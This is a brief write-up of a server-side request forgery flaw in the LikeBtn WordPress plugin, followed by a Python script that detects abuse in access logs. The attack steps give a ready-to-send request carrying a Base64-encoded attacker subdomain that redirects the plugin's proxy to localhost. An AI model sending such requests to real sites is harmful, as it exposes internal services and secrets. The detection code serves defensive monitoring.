Let's say that an attacker owns the website attackerwebsite.bla and wants to attack targetwebsite.bla, which uses the LikeBtn WP plugin. The attacker would then do the following:

1. Create the subdomain
2. Make the subdomain redirect to localhost
3. Base64-encode the URL of the new subdomain (-> aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE=)
4. Make a request to https://targetwebsite.bla/wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE=
5. The attacker then receives all the juicy secret info stored on localhost
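
A detection-side view of the request in step 4, as an added example that is not from the original page or the plugin: it decodes `likebtn_q` from access-log lines and flags targets that are not likebtn.com or a real subdomain of it. The allowlist, the function names and the sample log lines are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_DOMAIN = "likebtn.com"  # assumption: the only legitimate proxy destination
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def proxied_host(target):
    """Host inside likebtn_q; None if not a likebtn_prx call, '' if undecodable."""
    query = parse_qs(urlsplit(target).query)
    if "likebtn_prx" not in query.get("action", []):
        return None
    raw = query.get("likebtn_q", [""])[0].replace(" ", "+")  # parse_qs maps '+' to ' '
    raw += "=" * (-len(raw) % 4)  # tolerate stripped padding
    try:
        url = base64.b64decode(raw, validate=True).decode("utf-8")
        return (urlsplit(url).hostname or "").rstrip(".").lower()
    except ValueError:  # bad Base64, bad UTF-8 or malformed URL
        return ""

def host_allowed(host):
    """Exact match or real subdomain; a prefix or substring match is not enough."""
    return host == ALLOWED_DOMAIN or host.endswith("." + ALLOWED_DOMAIN)

def suspicious_requests(log_lines):
    """Return (client_ip, host) for proxy calls whose target is off the allowlist."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        host = proxied_host(match.group(1)) if match else None
        if host is not None and not host_allowed(host):
            hits.append((line.split()[0], host or "<undecodable>"))
    return hits

def _sample(ip, query):
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] '
            f'"GET /wp-admin/admin-ajax.php?{query} HTTP/1.1" 200 512')

# Constructed log lines: the page's value, a constructed allowed URL, an unrelated call.
SAMPLE_LOG = [
    _sample("198.51.100.7", "action=likebtn_prx&likebtn_q="
            "aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE="),
    _sample("203.0.113.9", "action=likebtn_prx&likebtn_q="
            + base64.b64encode(b"http://api.likebtn.com/stat").decode()),
    _sample("203.0.113.9", "action=heartbeat"),
]

if __name__ == "__main__":
    for ip, host in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} asked the proxy to fetch from {host}")
```

The decoded host is only the first hop: the redirect to localhost from step 2 never appears in the request, so matching against the allowlist rather than searching for "localhost" is what catches it.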